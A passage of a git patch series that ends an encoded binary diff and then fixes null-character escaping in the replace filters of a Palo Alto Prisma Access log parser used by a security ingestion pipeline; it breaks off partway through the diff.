zO@sQ6RzCS)0I=#J%MXQtwm}q7?s9tk)?x;lVnsr(qJx9W6lq>;f4igJyNxV=am6q%
zZ;xqN_Ip+18YkhAyhieUzm`I_=Es4kypj+;4=0z^AyeGAB6U{E3~e~8Z9b}hTU{R4
zM7Topc-k(j%=z_9hni2JNzg0gk@(;Ck#`;FQ<u$(7%c{ox^-2AeyYzVYXme!KBb#f
z1$v@jVS#ZQ57xVF#Mvi7CRFiCyLKc>&1MAUJ?Eu^o2s)XbTFFzS%DX?f}^sN55U?m
z_cnJ#(ylH`0{(m;(C`>P8!Y&HoK834o>BL)WfXqYK})tLnfFz1RY>oV?ff6frEQ*1
z4X4Amn!B0Dve!lu?VE3ujF!idJf`;{_L{o{WdY=k^bqp~{ADZ<AM$zr?=-NR_>zRq
zZ3f9<Oz@v3fy5%Q-054-fMjXTR^l4Tjl=I@Ck4#hc(J7|h-s!Y%`;$4?x6<2qpc^9
zIjw&@3%qY<Wk~RKz!J-n8}9urHRf~aq<8IZEd$C~3-U(FC5aJ>6~_rYvq2+ZH`4&@
z(Pnv6S5Vo;St2R9J(jJ8K-RYe0&by{fMDJ?_07V=eX5R>7{QaI%Tpvx@nEN_!Z;k~
z)wJ{eAW6IWcTwJgr1=>iFFDFY*aauNaW?$0WTxp)JwOO)d@3&SEr-sNq9TaK8`~dN
z!q&TW0(`km``w>LeWkCNc=b^OghUT%=vA-}@Y`#(cj&Bv7McZHsy}zsDo<OED&_A4
zU28>9G+=dc$TR^r$lgu|kwY)Y<Yj-3MO}tlif*1%2YsB)d+A^mdFu8%X$$gq;JDW{
zJyMW3UGW&P`gWTh^GDr2q^1BLw$=2e2gBSya0h(ykITGVk$TcjGn1p<AbMlipHyaP
z?x3Z!@v(9m?18%{Q|nRufAL7v4QViv@V=t!Hc>S53jn%p+1p#B-E`y|u!}ixuLjIE
zWud(FmD@xU&5N8eM>?HVZOWeaD%9N=Pw<KotW#A1$sokd-@a3?Fa#n;^;ScOG9KC?
zOEYbb#sBE!>Lv}M`1%E3ZM-p`g>0YdpQ50c|Ad7kAA9DKXo5#(X^!ar)Qu;^RHE*k
z^Otoj)Mv%lqO_a38&;V>Awi)yx}sa%N%Z<UY(P;GHl38Pr38hZc#MR&&Y?SR2`9Zn
zq16dX*w$kEjUgUhKV-haO9Zu*G=G77iH~@%*%>lJ5zcr@EI*y*4fgl>P7E?lx^5~2
zW{2&+FW7cik|A!2-+cc0`3bbg*#P}h_B;@kD67#b63ki_a`;<lZi0>efTO4p`~=$!
zapLx;t0P-FYc`Wcuk?}I`J#p;k>2zUA~?fE1*N_(AnV2nylF3Ppc7X|!3(7I{=~6c
z(e_dzvvqi53X?L<_FKOi5#h6RT|%5iFyH2Yj$6q^@bV4P{L=Jv;Oh7O<iKH{FJw&3
zfx5iPO&0ZHC=HlF(*C-4Cew$IT1h|Iw0pWA9?0GKc!VR!k(;4b+*?6sT{mLeJ5%kj
z4~J0d(4?LTn<R6*)M;g!1eJ(`v@89oG`K*)lfU!du+QZ5ex93^s3%1oD}>(Y!SZ5E
z_HTyzgxktSx_ZvjRXo!|Lw?P|eeH3g^?b;iFMP6+{BDQW6%#k$8<#wg7fEK&#i`X3
zA9XSxUqDKz`{`0Hx78rbkeLkE;(Yyr>mV$^*>m&WBQ|v4cj0TkR-g;%++5`8(&N;o
zi)n$Vp+E=Y*hRY)>ip9ya$Gz-_}6Gr8E8?mM_{v~(T3uXROH@5ixdSFMCcv&;h~43
zS;n&uv}D-)?fe63562g=xxUH(IlG%n)&~V^bODp1FjLu?62wAy^a)+i?3u|ko(F>3
z0!g4DHX|Kx&Qb{WpFwC-)~S)3SGx(KU-fkse$v*iE>4dF=W@p%QP88kLN~#cb##aV
zAwJ(fq68L}=9{Pe@0V8v0<juO(^EJJ8~T@=LVr@lCWe~I$nCIJ)su4S5^XMuL$mb8
z-{~Om`uC?t_^1<)89^h><`1oAjtw8Xf3eU8b$d9iRhZsFoJKJozQ;tScKjT3vYry#
z(~8EjCzMb8;%f`$axu{OzDoOC874yxY_0mXgQY07XR8E4k`DJxFQ>=^GMS=>{C7C`
zdJ-xIZpRZb#V7ztZ!f``8AI={>|C6BaNvIvJ(b}xks88=sfXueh;^X9%?%(d4N<(_
zzueY#>lT6U43_?0xoXcw8~wAQnUpRs#<-)T=b^x3&^A^ByxvdCF9z?EH#~&fiqg=c
zZ@ityEKgX>ei$D~=A^1Ki7h2tLJwd1fcB6iGWzm;=<$Zz9YPxy5m(|*NFAc}C>HU(
z(BEr*CrJ($)%|@`R~QIMKhpPWzp7Zgjm7-MKgX0Q1V*_gur>1=lq?5w@j#8h2lkv#
zER3968@a)@N+Bnso~eQnfc_UMx>GMt^-De8tol<@FQ{8T&OaqjLM2Z}6X17>k2C0z
zCFd(OX^UN<N=-<NnxMjo1=FOpa(-L=giO?K95@0dTU|1wV+>q(!QWk$`Hb_Jga2|D
z_xYkujFti^pf^?}PwEp`Pw&eYP<i~uemrdbVqECVB^5ahx(^c^_9OcI7ks8jb32=G
z+(VrB!nU109rdm-;e!n|I<}HgJftdIL1pukPnX2&K$U-MpQcicM-5D;W;i1Zk$zQ6
zf+v1%Y<8xI<G@!N`#pNRMyAsY)lU8M9NVS>$JW9rP0C1_g+=Pmn+mD4By^Mw1bPov
z*Wca+OZo9{VctUTiqsdLnLvU@m+7xRc6*)zmtE`CsjG60(}+Ab-1xerG=Y5E79g||
z8GKVW_w}*rwpQoMMsnDNRb<E%2d+f!C&$N`?*1P&%YA=;P)v_)Pi-~*2=KBC-efhH
zW<WmFZJlrMro~;c#O?g^wRewrxmNH>3*k)_hl)e{rmCgqFi{9;<)+=A1E12+UuCTa
zUffa7YuB<py*h+}&1zNgh!9ixRIBO#gY}$4*jD4Zd<x#JCCOjSicL$^5GAGR7$Vkr
zIhuR>ir*z8&6d$vn-r&N?LY@~!m@wxhuVY0Nn*h!|Lg!{f`9BnIDS$vtVLJsQ;?Nv
zUPqCorAhfu;sD?5Pg1_CgzMPz6smx{cm)M~Wa@YZrgDGy2gmWj^)ojqJOcH)cKGxn
z>BO529lMx@^hyisTjibHd+^4;)zZk1O`{8xaNH5{<15j?*O=@l8GI$)ZYPHIU<jg4
zo*9BXhWjcebmuGWG^LDpOAr_n6NoN5<wJq}3O4V0d^+9bRTy}JDIWchs+8<R@$USm
zQyFzsS!pdm%El;OFY=duhTcf~v4?^MJH!-aumC3?2d}OFm23g=ZVR)}mG?sVqL1n8
z4L!UllXVvUW}f{%F|1z7PNVt~l)J6ZRwQ!WjE~uU7HUV}9lDVDqawe<(*Y)Td!@-j
z-LZh-OmRK@>Td&XZR@EN`0_?f_Ax5E3+6A&wDpmudYN>uzxYsK1s6qViEo^!+kcJL
zN&YjOZi?QsD}VP2j;g`^`{qTss*wc}`sUUV)F<ldY3hH%n%9jf3R+=V;IW6byIV{n
zKirl__ZCn{Y##;K$JUj6YRt&C6-FjOi#ir(A6-yqi$ncrRx5C>%7$~}IPNjl*Rjbm
z^0)TtZcnb-Nb1@VA{j(}`Z=UnE_IUNpbnfUdXk}<6OD8iS8ZhcC|cfLY-TdV#ht|`
zc2n-S^?S?MNPrjCkx!kNq0;6APE*AW9-AHW{lhPZsU0nW+gW?FfV-n!>yeNpLni+^
zZTPPVXZ)7-LR+2GKnc}F&rCzYwU_!S39*#k#G#!Ei0M-Ss?^_C^?@|r{dq%}9o7me
zJ{%T(^k`BHsJ?u5Q(p@y8l=}a%PWYI{+c(srrPPiSOWqC-ILMJL6j^*d$0NAA04rG
zQ!gsr3@#Q#>`7P#ml(J`KRAG3*ku9yc0-_^5G=n`dU#8mML<12D$Qks{U}a#Z)-av
z#H(B^!Bx%{ddY$2(j=oX#&61c>27B{<TDd2^N+Ij#-;P=tfi1fTqasn$x<ObJv+eJ
z=cK|^cLN(Pug;A%9-D@nIwQ@qAtY^Qh3+g9WSm@)M`QB2$7LHA;hSdQ4c;MCuDZ%i
zDwWmgHBu?L=#Y<gGbsa_pu=H)hVm=rfv=*|x1DZXT)A%P-5=OPVr}zJJ$UODGxa~8
zFxu+6T)76+7UT5VZ~bm4{u=xa3{erLip1?_87V9!)gZc>-8)v_Dy##d(DpsYV;To*
z-blXgVYD|$%xTY^Bk)I88T3`+S4@9erTgyZ1w}acj^!IJoe81JTdxh5RM)^v`N`0<
z3!&Dkd!rhor63)jL(e#^y`5*K(12LW-Uh4sAipu>`R~@I-&HMbHb;@VAWtv}x=y-x
z5^f%7^1Ge(RYU(CxK5OChy#{MNs+rg?s^y{{sqR4wEvf+L)U0DlGaSNaq0`-K=c*e
z(&S%evOm2vR<$0bV{gW?;BjW4SWdKme9`i(E$aHoZTDd~@uZw8f)Xoxp?Y6s%(-es
zmey6|87^3cg);ALVhuF+=o)`CnVc_aGSiyp4O?Z7vt{Pb3=mN~R6_fvdzqoUCpbcm
z>kn<fk3#zqfvP)72=92g`*~zlk6ZW-V^|?876X_2@`<q=D$Enx)9xzjvu-6onSIgj
z>H67c66{U9*Q>mmvdt7;<lo`Ir*a~~x^MY*9*8)<W|q2q&CY0kBq_uwxO<i5QDcd7
z%?7~<M?K~oOz6zMF3plbU>CnP7^OZ9d*ZKyB6JzhD4J4DAK%MCW+pS26LC#MpKO5<
z?kW8u__^s1%kXt3K6Xcw?`lh*wTGD8wD<b<?Bg=+1#Tg^9<i%Mud&l}p)UFPiUa$Z
zPrRX${>rxHhqGG*5uqV!C7yF*XmaoaLp+uY+Odh9bJHXgfC?}MjWbS!zt7cWS}lji
zTk6v)-cnyH;oqXl71TF{Fs!ThWulijnaFEjh&9+bvq*4O&I~{>#PO_kznVS!-dAtN
z9Y3h0d_ogwif>x)q%>9e*X{Du{UcYbFdr?gcG?i0Blrq%SX?7c<`FHLvgA77pU7K|
zCea36^PlbXDJ+=rtDL3v1pt*Rx0oFTSN5j}fj07$>La6hDTDL4gxMBI<K4lkErG_L
zmoL1=94-sEg2<pLRP|WEHb*P}Mq9nLilHJH7lba9nAVv57p>+5(SOBGTwx!W2%1QR
zUHcZg^4`DI0qc2gE|htHtLDCgzhdcz8pw1383>YKazTNrChlu;*POSczj`Y(kkv)m
zCPrz8(B6LN91-ZO4mwT6X0=;duns-3y}w8v0~z0t>=e$5hMOtzKER4fP#WTo`FWN+
z4%S_a99#VZKw~?9D;qAz`g$REs3#W=ZB_>7mo-oh8L^L+ne4xy8`*w`ol6LIy+bvt
zBi<?(C^%Z6?kS0_YWt$UlD|JDRa5seF%C5IQD|<~7=}~Gm{nz$Py|?&eHz1a;v||(
zMQqk#W@mDapyEqolKAtARD&&pAc;iQck|i>KN77!798We5xztgnFYhM4YAzr+YSml
z*)`lMqQQBK{M7p^Gh-ZBH>lmFTh&F?t1}JHk*VTq6fCjBLs4*W0v#VzzkqW@SoSpm
zr~CKpB`=jDW_Tr6NffU2@BF9nO6t`u)3PGYGGn&kH>79e9H_o`oT2NMsi{GQy2P%k
zkn!}C-W~=>A<15}G|e~tg|uNU9kFiC(E?DWSUdmHGeOjt0~qtYcXKuyjx@lB<I0kK
zE^<(<EbqNf%Cijxg)gwj{!nAy*^;%eC0ZYzd~$iFqPE5nN5QM7jV`f%@?Y|ENjVCm
zuf6z`J7tZR=t0kqIr_I8Rq9to!$6Z?{eO3Nuj#&Ez$ULHD)lwy4c;rZp$Y&j3nR1j
z4sX|&bs}-SBg`zgV(nLnk1klYXgrn*O34+Vurpg$dkj9?`;GqDrC(!nB7t$A!O~${
zGv49>Ef(b=Q~GuWyDh7k`$QqfMvFl$5msmMmtSJ!r{3ZIUZVzMtu&yu?!BuTE!`DK
zVK_YBG(BFy;;Tx#vcOoafyPq}Mo};IZrFrm*g_@gFFE3T4G1;H<;`;t41i!ETU{HR
z&bbBQobKufZ|8^>jw{33LAO?a10N}Z-V5B6{6&U$v;cQrzG72jp@P-ar4I$jlXEHA
zT|Q1O6@|!a2A%TD5x22+x%J$X@;~df47Y$3V-Yg4=3M|Ot1io`EH5Y=k^UqVjSuWY
zDr^yS0f?#!NqIJ$7}z_hIT7?HfwrL!N<pBP6cR20_2cc)Yq94hU|LbavvH^8!-nih
zRh3sl3%2W1?Q$947Vhe0!@&^(RC`82Q;P4Ea&L%P{~%NzCPqE#_J%18jujB_{*RuR
z;a1&_3rMEYrkn(8Qlq}U4#okwNd5pc`+S!qTNKh(<8zB@VooPF;cD-YHx~v|3WAiZ
za#45#u|o}T;_mj-dU08pmE+*;RQ_$|zg?$&|0hb8`vrbNX<iAVnf78viLf$0OAkvW
zpE|;qYee8dB?OQy25}Cyvo3P@?0<KAt<jaXqh4HNU}CQ1GkG%MH}~f6TPa_BFhLPW
zL2X~Y1bP&e={?Gv-9oqH@!elL^v+!aQO@em7l;}4sG|lpqg@c&{F*H;pEP69WCA{$
z!r8DP2}!G*`5dV0_4ZbFXLcFa`wED%@uH%VbBu_zPwO4Jyc-Aa)ujVXT}A+uj1UxL
zDLUQPZoc68vPb#5-XP8WX4A|kxvT|p;Dg=<k~BUg0ItxJXS`hB*uu7Prj)_OXQxr|
z-+o1u7G|4wYE^JUq#shf3N2~hF#Y;>Skq#2bCIu|16R~zSC77ECVE>zx7T#8=2##g
z(}o#Dl4#(OVGKeT6Ga#+;}S}O8J?9!#vLT^rhxw#&Y73K*kqu}YCA~^o$q!^>OLFP
z#Fn+HxxJ1KTmJgHN+C3$WHvZdH=hTk|E;zYD6x)^q^q@=zqCuO3eh<dwcWV8PO6#J
zsk}9sJN3^U`&8%+`ahGAEakV9!LpJbFL0^PuLAE79SY*V7=sOm6}1?z{YM}X9NFhS
zs3E=Be$TC(Hxy6M)o<@DUMR&|_1=M1jH};sLms{%zv>Uha@h6fDGCUDDuTQ#G^t12
zn>Q&BR(y%Fq~uN3OWM^I6ejY?4*>PcUmG8E>$kVrXnj+}BM6v`equjmXP<I`GSvaD
z&sK+`Sa8XZK+=*9z5GXn`HR8enVT@tG^P%iGQqnu5)pxE?s8t9y1mJ+4Z|_3fn@W*
z#V-%DeYFlNo@brs6yE(4D=+GZl8rm4o{I&+G)Yb26F6|BxQO7g`}YI8xB3^6P3@1D
zy-WWzQQ?K86uB2|u9l<zu5_J#PBiuX)q0<%(@Vf)=MJ0u3lt$omV=?;lQ#FC%~Cow
zyUrAq0(=HlU*U&~E7qvcl#3k;fs3?0qX)bTYe2~N^4H0Q`D9;(u+8(QGHGclt%^lF
z$h?GHT~>3ID*AmhUCsPOv>%@$KWfpKRS9gB^S>sWw}}j;X9k*L1}c6G6%^XM+!;vl
zB{`(`4^+Bq9t_WBlO}3z<39OFB~wX&e@#^P`>v!^vuZ8uS8ODrR%gWN_Y-Bkj$-I{
z&0e7xMij`NVDlG~Em|-0CE_aX8&E)pN5dNUwd?+=p-+)44a{ir3+V24Hj1dA!N%dp
zCjY@yb6{E(zSePqXkEihs+_$O<l{RP2RFt@(URZwp_!<XY+unx1hy^yN->=VihwMi
zHw9XZ5;_s(`5Nn+{HH{OuYarTlqK5QX+$I}Nbqp9c&&qK8YIR4-G$Lbvg?aQky%2&
zgT!08>&QiIB+B}xQgRkdHRU<%!HjD`=gN&>O(E{lkPKG|XR+*<la%qSdGDUZyA<Sr
z+cX7kpYGz00a9qt_~=BL(aDRQHe;Y?=totuVFLnh;1e3I=4?}ZX_xt0CirJgNtl6d
zOhKO%Xv<j7FG}~AG|Qoq{%&rgTz#0H|J624?LiQ3ReErL3m~D<BE^-!@gpd>-BaD)
z&9*0K(rHB`$!$}f^y`qkggmU?2tONT;+=MB0tcxCR-CO0D92uAmgHK<x%&QX9wMPS
zEtAn7rTMQhceA0k0yf3*E(Fl~x7!)vP1B^@Q48<0?0GTiUU{F0u&*)R^2VcS#s>r~
zc~A1~X>zg;sfXioSFczbEIQ{6TPiIlxsv-2<Tqf_88Lz#mg~v5oi-bOC2wXh7Lg*;
zA#YOe9hBYrZG7gFo7ThyAD-84WG9cb*U#3*dTvD{eQW1ko%XPAoXswcc!o$yg{RQN
zoA4jILA^p=S*L4jSABC~$?yKs%;xpED1`_)(GCbVZ}^%Z|5!nODrO}x({ABxU4lZw
z=1g2q8Dzslp(CT*&7ef*2!*r;to559F(gJt2m?|s(QQXP9lkeU``e4jT%+WNi*{vk
zrZ~w`*V!SXXvfLjs>N`=HrT&qbt32sdri>o6Qc6@{kJp=Yn>NGdh;ltxDGD&I|U#~
z%4mk)&`S+PnW5um$AqO?CaJ+)ZS$kJR);R6&T}FTbJvHjL)fgkW;e=J=M~%_^KZlT
zIPF&n$sDWbyEzn=PIf2&*+gj#l>O9=r#d1kw`XF@boYyEK9f|d!xzLmSa0FsAb}v+
z#D-LZ316akGF4DtAy!bV6Ozt%`%U@GKm+Ap(U@l8UFtI_*+jCtRw{o3JdA2_xYxT<
zd++77X*;UR140sSQfyBgl%R_4O9q9<{(mfc%*E%5R}rZw^-R?-?|lx|15za+TX#<Y
zHkPR?!6vE&o)?(zjVh`lCVbt}Kq+bK)_B>of%fSlNndA9vk3p?M|6ucz9h4C==NG$
zzh;dsM~Vpiz>0lO?7xND4L&nLCD-$xZ;H~~!K=vin1kmyc-`zWC!BF)U)08B6Hjov
z{20P9>Xwa6v{=ma@TUoe$0FbRX%7KPrTLmdmFz>i$7<B_K(D8KE}YAyVFKj9MI{jy
zzEg*kQGuTx9G^!+OcUZ3*MRr3+i{W4OwCt~g$e=R_Wg@MZET}F*2@yJzfv|CznFFl
z72YikjPDsC=2bTcJvEC0OewY2F(_R#?dT9L$E&XT%elv0=5Ve?(Ha|PB@7aChjvxB
z^5z(q8HlrE(S44Y++q5}f|Zy{9lDPCbZI?b@5{V9(_k2MSTOub%Xr(-mO2so@=-Lh
zVH24YQ|uSVou)JF4MO!(pfp$gwEO%`HH9R4jre5lE7%TG6gT!~7NcoGo5(bA-(vTh
zg0rK9*^oI~@jyD)si~M2#$Ww!IWT68n@gT#$hcp<VUuOW4SZngk7BEFY-KqW%HH>i
zyv*_@J-ek7m+4OwoS##u7jRS6GwOU#bSo!)F*K>fAAHPUSEmuDhx)k_`9gWyOC^pB
zFT2D~SL|+{B&eq5<bbVg#QE*xm)TFvP8Ty(3QpaS>%FS}@nj>-r@c&0M1vp?4}F@J
zvbr*JK^{$Qz3nKkDal#fHbCDE1sgT-FKAY@J~J1R9?vu~c2{sEcvYKwkK-S(g)i_B
z2i9&os(9#GY*=VI@s%sLlfpr@--_&UiVvuBHp^T?!n@5N`pO70%;V8(kGB~pQ#A3B
zqVBdF*~}e{?jf|6P(h}{#*2Z{P}v?c?v0=i?lD6Yr=y>E2!LMe@Rr%)0LITsXAu_@
zJ1%LMCmg$IrRf<1f9I!X`jkX~WVOpiS_~s6r6YXuccpxXmo#2bLqf}M(~GGvNjQ@N
ziY<BAa63*T)7P*_&31x`CHqm2k5{QINLX)wG7KhWs_VueT1}M>gENp;#hKgMEBl2q
zKZa@WsUHycE%=6k1}u4-0!7^n_DHiu0+q81pD;f&%^%a;oU{xlMnXtrtCx0I)uVkR
z2a#1+*u64a12#)uOcDXKcMqAzjt52ujsB*DPgtz^qX=2;LW++~^ta$!+fNTZRgl&w
z^i(l^oIbrba*xPRL#tod7N`I7a~$DUz~wil1`Z+f9@%S0--_~<ssVsYp}wZ^{!&TY
zdKd9^$HzZ=zvgYR0=dfP`IydRgfxFgOQ4Yh_e&#*b`8x+DALKv!x?(-S-B#ljE22d
zh3~s|%Umc(peUfQWcI%_l%CwW^04sK<6$aJtmFg-Ru#B{#e=K#TuDVXR!{<ubbJ_O
zX6xIZ6Y6p$bK1C}zWek@2m{q)Wb3++7g?)zMG)lqHKcF!jo-(27nXE8v{}5!vG;D^
zTi`_+aLLi+N#4O`PuKdkuVehZ*Ddjz@F$kj2iYN0wgGPJ;$-2U_Z%bf4ThM7a|(#w
zc5zP<L&sIhO*Kbx^~h(cSU*4vX+IZMppwJWcdWp}_Yy$~9u(H;G)H)ZTQ=n<&63|~
z3wJfQ84?}pa2dCL7i?+Hp+!E2ol>r`?@ue4T7K)z%bAvlX6s=FDr53$I7tYFRT(HE
z=)_Kgw>mmOSk0(E5Gx`RKV+x_nuHqh;!H4!jTY<{edrgDAUf&?c;PZ!Fi;QkikKk8
zzoFuQ++3zv1K=eV**iJjYRgV^t1g}K>Dz!>-kW{P#9_-Tfx}s%uU{i2)9}4oxbH<L
z>#Nn}ytKY3)>S*W5-ncj3~S-vZL@3CGTEzqA|byvW-YwH49t4)I7yh`=_TToZvUnD
zLORy7xd89v);U^B^oRu8e+y;^&Q?^iX{`RkB;q^Rp{*Q}HA}7#)-}$Lq|>T^O}PqL
z*&Lso66Ve+>>(oPw_j@`nGMy!yh4xgjRdaY6#{SMwUyFBv$`6}*kO>c3hSNCR&=nR
zfjKRf;o7ejU2Kq~3W!R%28|iA$tTf;;m`kb(dt^`Q*On($-Vf>KbgBsZ>rwkX}YZX
zjrtI-3RlsutIWwO)&%8re8jveSJ{m(W@<T^+h}*T9y}*NyxY+t{DR8qUWLt%_PCqu
zN)3I2q-K#sr%o^I$pkhq)t2or`J8}yUM6E^dO4Q-FPPAL@Jy-I{EWH>0U@7!)xXkF
olX42peHh}w`TzHUls`*73~=%XEFEkk-W>ucDX7cW$(l$0AMxvZDgXcg


From 11cab3ea5b453df67ca630a64382d1055f907e7f Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 16 Oct 2024 16:50:39 +0200
Subject: [PATCH 156/317] fix(PaloAlto): fix nul character in the parser

---
 .../paloalto-prisma-access/ingest/parser.yml  | 90 +++++++++----------
 1 file changed, 45 insertions(+), 45 deletions(-)

diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
index 970bde48f..113ef7fdb 100644
--- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml	
+++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml	
@@ -714,51 +714,51 @@ stages:
           user_agent.os.name: "{{parsed_event.message.ClientOS}}"
           user_agent.os.version: "{{parsed_event.message.ClientOSVersion}}"
           user.name: "{{parsed_event.message.User or parsed_event.message.suser or parsed_event.message.PanOSSourceUserName or parsed_description.message.user}}"
-          paloalto.ContentType: "{{parsed_event.message.ContentType | replace('\x00', '')}}"
-          paloalto.DGHierarchyLevel1: "{{parsed_event.message.DGHierarchyLevel1 | replace('\x00', '')}}"
-          paloalto.DGHierarchyLevel2: "{{parsed_event.message.DGHierarchyLevel2 | replace('\x00', '')}}"
-          paloalto.DGHierarchyLevel3: "{{parsed_event.message.DGHierarchyLevel3 | replace('\x00', '')}}"
-          paloalto.DGHierarchyLevel4: "{{parsed_event.message.DGHierarchyLevel4 | replace('\x00', '')}}"
-          paloalto.DirectionOfAttack: "{{parsed_event.message.DirectionOfAttack | replace('\x00', '')}}"
-          paloalto.EventID: "{{parsed_event.message.EventID | replace('\x00', '')}}"
-          paloalto.PanOSContainerName: "{{parsed_event.message.PanOSContainerName | replace('\x00', '')}}"
-          paloalto.PanOSContainerNameSpace: "{{parsed_event.message.PanOSContainerNameSpace | replace('\x00', '')}}"
-          paloalto.PanOSDestinationDeviceCategory: "{{parsed_event.message.PanOSDestinationDeviceCategory | replace('\x00', '')}}"
-          paloalto.PanOSDestinationDeviceHost: "{{parsed_event.message.PanOSDestinationDeviceHost | replace('\x00', '')}}"
-          paloalto.PanOSDestinationDeviceMac: "{{parsed_event.message.PanOSDestinationDeviceMac | replace('\x00', '')}}"
-          paloalto.PanOSDestinationDeviceModel: "{{parsed_event.message.PanOSDestinationDeviceModel | replace('\x00', '')}}"
-          paloalto.PanOSDestinationDeviceOSFamily: "{{parsed_event.message.PanOSDestinationDeviceOSFamily | replace('\x00', '')}}"
-          paloalto.PanOSDestinationDeviceOSVersion: "{{parsed_event.message.PanOSDestinationDeviceOSVersion | replace('\x00', '')}}"
-          paloalto.PanOSDestinationDeviceProfile: "{{parsed_event.message.PanOSDestinationDeviceProfile | replace('\x00', '')}}"
-          paloalto.PanOSDestinationDeviceVendor: "{{parsed_event.message.PanOSDestinationDeviceVendor | replace('\x00', '')}}"
-          paloalto.PanOSDestinationEDL: "{{parsed_event.message.PanOSDestinationEDL | replace('\x00', '')}}"
-          paloalto.PanOSDestinationUUID: "{{parsed_event.message.PanOSDestinationUUID | replace('\x00', '')}}"
-          paloalto.PanOSEndpointSerialNumber: "{{parsed_event.message.PanOSEndpointSerialNumber | replace('\x00', '')}}"
-          paloalto.PanOSGPHostID: "{{parsed_event.message.PanOSGPHostID | replace('\x00', '')}}"
-          paloalto.PanOSHASessionOwner: "{{parsed_event.message.PanOSHASessionOwner | replace('\x00', '')}}"
-          paloalto.PanOSQuarantineReason: "{{parsed_event.message.PanOSQuarantineReason | replace('\x00', '')}}"
-          paloalto.PanOSSDWANCluster: "{{parsed_event.message.PanOSSDWANCluster | replace('\x00', '')}}"
-          paloalto.PanOSSDWANClusterType: "{{parsed_event.message.PanOSSDWANClusterType | replace('\x00', '')}}"
-          paloalto.PanOSSDWANDeviceType: "{{parsed_event.message.PanOSSDWANDeviceType | replace('\x00', '')}}"
-          paloalto.PanOSSDWANPolicyName: "{{parsed_event.message.PanOSSDWANPolicyName | replace('\x00', '')}}"
-          paloalto.PanOSSDWANSite: "{{parsed_event.message.PanOSSDWANSite | replace('\x00', '')}}"
-          paloalto.PanOSSessionStartTime: "{{parsed_event.message.PanOSSessionStartTime | replace('\x00', '')}}"
-          paloalto.PanOSSourceDeviceHost: "{{parsed_event.message.PanOSSourceDeviceHost | replace('\x00', '')}}"
-          paloalto.PanOSSourceDeviceModel: "{{parsed_event.message.PanOSSourceDeviceModel | replace('\x00', '')}}"
-          paloalto.PanOSSourceDeviceProfile: "{{parsed_event.message.PanOSSourceDeviceProfile | replace('\x00', '')}}"
-          paloalto.PanOSSourceDeviceVendor: "{{parsed_event.message.PanOSSourceDeviceVendor | replace('\x00', '')}}"
-          paloalto.PanOSSourceDynamicAddressGroup: "{{parsed_event.message.PanOSSourceDynamicAddressGroup | replace('\x00', '')}}"
-          paloalto.PanOSSourceEDL: "{{parsed_event.message.PanOSSourceEDL | replace('\x00', '')}}"
-          paloalto.PanOSSourceLocation: "{{parsed_event.message.PanOSSourceLocation | replace('\x00', '')}}"
-          paloalto.PanOSSourceUUID: "{{parsed_event.message.PanOSSourceUUID | replace('\x00', '')}}"
-          paloalto.PanOSThreatCategory: "{{parsed_event.message.PanOSThreatCategory | replace('\x00', '')}}"
-          paloalto.PanOSThreatID: "{{parsed_event.message.PanOSThreatID | replace('\x00', '')}}"
-          paloalto.PanOSVirtualSystemName: "{{parsed_event.message.PanOSVirtualSystemName | replace('\x00', '')}}"
-          paloalto.PanOSX-Forwarded-ForIP: "{{parsed_event.message['PanOSX-Forwarded-ForIP'] | replace('\x00', '')}}"
-          paloalto.URLCategory: "{{parsed_event.message.URLCategory | replace('x00', '')}}"
-          paloalto.VirtualLocation: "{{parsed_event.message.VirtualLocation | replace('x00', '')}}"
-          paloalto.VirtualSystemID: "{{parsed_event.message.VirtualSystemID | replace('x00', '')}}"
-          paloalto.VirtualSystemName: "{{parsed_event.message.VirtualSystemName | replace('x00', '')}}"
+          paloalto.ContentType: "{{parsed_event.message.ContentType | replace('\\x00', '')}}"
+          paloalto.DGHierarchyLevel1: "{{parsed_event.message.DGHierarchyLevel1 | replace('\\x00', '')}}"
+          paloalto.DGHierarchyLevel2: "{{parsed_event.message.DGHierarchyLevel2 | replace('\\x00', '')}}"
+          paloalto.DGHierarchyLevel3: "{{parsed_event.message.DGHierarchyLevel3 | replace('\\x00', '')}}"
+          paloalto.DGHierarchyLevel4: "{{parsed_event.message.DGHierarchyLevel4 | replace('\\x00', '')}}"
+          paloalto.DirectionOfAttack: "{{parsed_event.message.DirectionOfAttack | replace('\\x00', '')}}"
+          paloalto.EventID: "{{parsed_event.message.EventID | replace('\\x00', '')}}"
+          paloalto.PanOSContainerName: "{{parsed_event.message.PanOSContainerName | replace('\\x00', '')}}"
+          paloalto.PanOSContainerNameSpace: "{{parsed_event.message.PanOSContainerNameSpace | replace('\\x00', '')}}"
+          paloalto.PanOSDestinationDeviceCategory: "{{parsed_event.message.PanOSDestinationDeviceCategory | replace('\\x00', '')}}"
+          paloalto.PanOSDestinationDeviceHost: "{{parsed_event.message.PanOSDestinationDeviceHost | replace('\\x00', '')}}"
+          paloalto.PanOSDestinationDeviceMac: "{{parsed_event.message.PanOSDestinationDeviceMac | replace('\\x00', '')}}"
+          paloalto.PanOSDestinationDeviceModel: "{{parsed_event.message.PanOSDestinationDeviceModel | replace('\\x00', '')}}"
+          paloalto.PanOSDestinationDeviceOSFamily: "{{parsed_event.message.PanOSDestinationDeviceOSFamily | replace('\\x00', '')}}"
+          paloalto.PanOSDestinationDeviceOSVersion: "{{parsed_event.message.PanOSDestinationDeviceOSVersion | replace('\\x00', '')}}"
+          paloalto.PanOSDestinationDeviceProfile: "{{parsed_event.message.PanOSDestinationDeviceProfile | replace('\\x00', '')}}"
+          paloalto.PanOSDestinationDeviceVendor: "{{parsed_event.message.PanOSDestinationDeviceVendor | replace('\\x00', '')}}"
+          paloalto.PanOSDestinationEDL: "{{parsed_event.message.PanOSDestinationEDL | replace('\\x00', '')}}"
+          paloalto.PanOSDestinationUUID: "{{parsed_event.message.PanOSDestinationUUID | replace('\\x00', '')}}"
+          paloalto.PanOSEndpointSerialNumber: "{{parsed_event.message.PanOSEndpointSerialNumber | replace('\\x00', '')}}"
+          paloalto.PanOSGPHostID: "{{parsed_event.message.PanOSGPHostID | replace('\\x00', '')}}"
+          paloalto.PanOSHASessionOwner: "{{parsed_event.message.PanOSHASessionOwner | replace('\\x00', '')}}"
